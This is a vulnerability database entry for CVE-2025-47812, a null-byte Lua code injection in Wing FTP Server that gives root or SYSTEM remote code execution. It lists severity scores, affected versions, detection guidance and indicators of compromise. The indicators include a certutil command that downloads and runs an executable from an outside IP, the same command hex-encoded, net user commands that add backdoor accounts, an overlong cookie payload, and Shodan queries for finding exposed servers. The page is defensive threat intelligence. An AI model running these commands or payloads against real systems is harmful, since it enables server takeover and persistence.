cbcvebase.
CVE-2025-47812
published 2025-07-10

CVE-2025-47812: In Wing FTP Server before 7.4.4. the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session…

PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-08-04
Exploited in the wild
EPSS
95.34%
99.9th percentile
In Wing FTP Server before 7.4.4. the user and admin web interfaces mishandle '\0' bytes, ultimately allowing injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default). This is thus a remote code execution vulnerability that guarantees a total server compromise. This is also exploitable via anonymous FTP accounts.

Affected

2 ranges
VendorProductVersion rangeFixed in
wftpserverwing_ftp_server< 7.4.47.4.4
wftpserverwing_ftp_server<= 7.4.4

Detection & IOCsextracted from sources · hover to see the quote

ip185.196.9.225
urlhttp://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ
filenamemvveiWJHx.exe
pathC:\Program Files (x86)\Wing FTP Server\session
pathC:\Program Files (x86)\Wing FTP Server\Log\
url/loginok.html
commandcertutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe
commandnet user wingftp 123123qweqwe /add
commandnet user wing 123123qweqweqwe /add
processWFTPServer.exe
cookieUID={{repeat('A', 2048)}}
port5466
bytes
636572747574696c202d75726c6361636865202d6620687474703a2f2f3138352e3139362e392e3232353a383038302f454f70343565574c53703547355577705f794f436951202554454d50255c6d76766569574a48782e6578652026207374617274202f42202554454d50255c6d76766569574a48782e657865
  • Hunt for anomalously large .lua session files in the Wing FTP session directory (C:\Program Files (x86)\Wing FTP Server\session); normal session files are small, inflated sizes indicate injected Lua payload.
  • Session .lua files containing 'local function hx(s)' or 'io.popen(cmd)' patterns indicate active Lua code injection exploitation of CVE-2025-47812.
  • Monitor POST requests to /loginok.html containing %00 (null byte) in the username parameter as the primary exploitation vector.
  • Alert on child processes spawned by WFTPServer.exe executing cmd.exe with reconnaissance commands (ipconfig, whoami, arp -a, net user) as post-exploitation indicators.
  • For CVE-2025-47813 (chained with CVE-2025-47812), detect POST requests to /loginok.html with an overlong UID cookie (2048+ bytes) that trigger error responses disclosing the server filesystem path.
  • Use Shodan/FOFA queries to identify exposed Wing FTP Server instances: http.html_hash:2121146066, http.favicon.hash:963565804, title:"Wing FTP Server", or Server header "Wing FTP Server".
  • Session object files are named with exactly 64 hexadecimal characters and a .lua extension; new files appearing in the session directory during/after suspicious login attempts warrant immediate review.
  • ·Anonymous login enabled on Wing FTP Server significantly lowers the exploitation bar — attackers can inject Lua without any credentials when anonymous access is permitted.
  • ·CVE-2025-47811 (Wing FTP running as root/SYSTEM with no privilege drop) was deemed unimportant by the vendor and remains unpatched even in v7.4.4, meaning any RCE via CVE-2025-47812 automatically yields highest-privilege execution.
  • ·The second trigger request (to deserialize the malicious session) can be any valid Wing FTP web endpoint, not just dir.html — defenders should not rely solely on monitoring dir.html requests.
  • ·Wing FTP log entries truncate the attacker's IP address during exploitation due to the null-byte; the IP is only recoverable from the session .lua files themselves, not the domain logs.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.